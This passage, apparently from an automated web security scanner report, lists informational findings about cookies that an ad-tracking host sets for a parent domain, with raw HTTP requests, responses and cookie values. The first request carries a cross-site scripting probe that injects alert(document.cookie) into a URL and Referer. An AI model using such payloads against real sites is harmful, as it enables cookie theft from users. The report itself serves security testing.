GET /F08747/b3/0/3/1003161/36740428.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ehow.com%252Fcomputer-software%252F%253F206d4'-alert(document.cookie)-'dbefd3749fe%253D1%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F4%26DM_EOM%3D1&C=F08747 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(document.cookie)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsNUvcS5nJgFEV8O6cA+G4idxFuQPjAyWrSbmZ3Tbl2Rd84FlLVUcISRc/FsFPa8heywhNNg5oFbPl3F4dMO1sqcRu9XvUH6T+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zRL+mPOkQo5u7ZqcIkcvVGKIHC87XbFyPcMgOVI28QjWTCBD7gxqlIHS30QpvQ23aySIZt5ZxD55Z2c2GGfqWfBB6nr8wTvbeVNSkATrp9p3laMToYhkfC7XcQCg1sRH6YdvSsYEoFIsVF5hdhhIgDfYapTcthUYv2wg5i1ihR2cqliV1Zn67wjWxNJuVi6joDXBNdhcMPCFqKzLLKTl4ZuhIeYoc9iXeucply5kFJgfG2imXDzFbc7uGwNb8HtbLXtXcaj5yx988Z002RRxTALk7uCob6xDvhIj76C4h3+AECWUFcJU3nGjKAPJQ; rsi_segs_1000000=pUPFek+FbwIU1kNSb/ceIeEiFPKYQmrWz2Sx/aHo4ZtovTUUN7v8PGteSudqC0pSV1UN7CarLjZircRwZ33QVshZHzTRgQMvN3mbIlUhsyvLdnBnw4DsfPWlLdp7bBgxNo9SwdUf1Jy3WiNDB/oOe3QW7hLOn/AIO4E9jvXWcPKX+d14Mg7753iFdSXmT6svB21FPydN5rKO9dDvhLPPuHsI/SG3qigk1+FQvXEXi3q5H5w4Zi9piqi7xoA27CP4UGZxF+HktYxd90/HvB0QyQkd++YzsqbAEA==; udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFBImlqLZ8Bpa581egiY+HdL0MFe+V3a6FAtu4YeqRWw/4rEvr3GW7itWTQdX9hwqHzdspOZcHj8CDuJkFKSwJuccLnUBdhxToVKZaMzHHQyVLRsAj/+oVYzcpNtcBQ1hAbtPrRPDY7tYohg3JUphsBugGj9i73Wzm7oTRwGcrWXZcSXg9y7/rsLSvnZ/7Dl0DMs+YinqC0fldwaEuUol3as8xIvtd671ofAb+lib5Lde0vPODoRSR8qhdsvA4BM9elbUpgoE4vYUoXmWyyNGE9xS89rSZL5v27374U+kw5LkEgPJvn17+mmRirYr8loMSxf2W5PO4aV2xYG3cac6haKDI9RQcIBPjOMkVwIaK9zpaw9yuQgV6tzHXzfy33BAdKcpgq0WmbhPKvGYmuHU3GBWsmcvL1I7gLZJy0Mt1u6iXHzNwzI9nW6tzfRs1nuKoc7k+05ieQKya877028lu1NPrDFbTNygmGh8xptL8FNji/NDQJVF1synPrnbEi7uPhkeSekKoj23uHbAj/IzSwXiZsLe6SBO9mtlygNGi4auZbDuNRIQ2GyoCjB4iRgP47Aqw4PjEKFYoWa0Tc8aYawanMD6st+yDDCAmOVWJ0i8DMv9Rwhb5OF+8R87KSRxbbzTeaKtQuOADMLmMLzSuRI5dHey1J0oYZejawYPrebU9DY2F0zE8dcnGbV4QxKikg9DCnU8tyXUXeDam8NDTL3xEBiKdnd6Rz+ioi72tSrUX8i2KAsY9j4Se+GJ7/gQlQLP+3+XyfCK58sjyGu+TD+08XNZ4KPPn7+rfyI8tcMUmu4UY4EAFjWrXpR4Ju6Lt2uy41b2wusKIvkaH8PQ3U2BJohkdxskH7dieA1ZxxyLw9mzKUe94nGVRW8WwHtLL+9es0mrhS5q5vadi0ti9vVJGUGEYn0dpIgvW3t3URhiwMwIsUso1bHEe3aEn02wYcLXfpl0CvyUC+z3TKVI+2x32bqsv5pKLr1IOdi2TRmnxKGcqVk+QbOXt/1DXcIEi2J7XJTbtNhVwplJoEIs0S/ZLSz9SIy6ExMNFE+ieYh+c8N9TIFos65XqbnaPkD2meKdf8lRghsIoJZ/Yw7HWh0SOR+ZTtXpeOmFSwUaU4Xls/MWZGdIxVMIbCCYQbCf/b4axvRCcmYteTHTlGtZ3KrDx4oosJXjjMnJelLl7bPRi6iKlM12dd0NAKxd2sesdj6iS/GhTZd8c=

Response

11.173. http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/374759838.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkETCCM1VkTna+U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/374759838.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkETCCM1VkTna+U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:19 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.174. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/410748832.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtlR8qmZ5EYm2QQMyGpObby+s31dLuX4xv05SCKjYPZg8DcFAyTvYmP4RX+R+TaaI1VgVUa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/410748832.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net
Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zv0tYD6wb/nfBD4w==; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtlR8qmZ5EYm2QQMyGpObby+s31dLuX4xv05SCKjYPZg8DcFAyTvYmP4RX+R+TaaI1VgVUa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
Set-Cookie: rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:03 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:02 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.175. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/410748832.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ckvYdU+ser9duzVms/e5MT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:01 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6495&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/410748832.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3ckvYdU+ser9duzVms/e5MT; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:01 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6495&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:01 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:00 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.176. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/449293090.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCVyCyiOI0VkRNa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:44 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6484&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/449293090.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
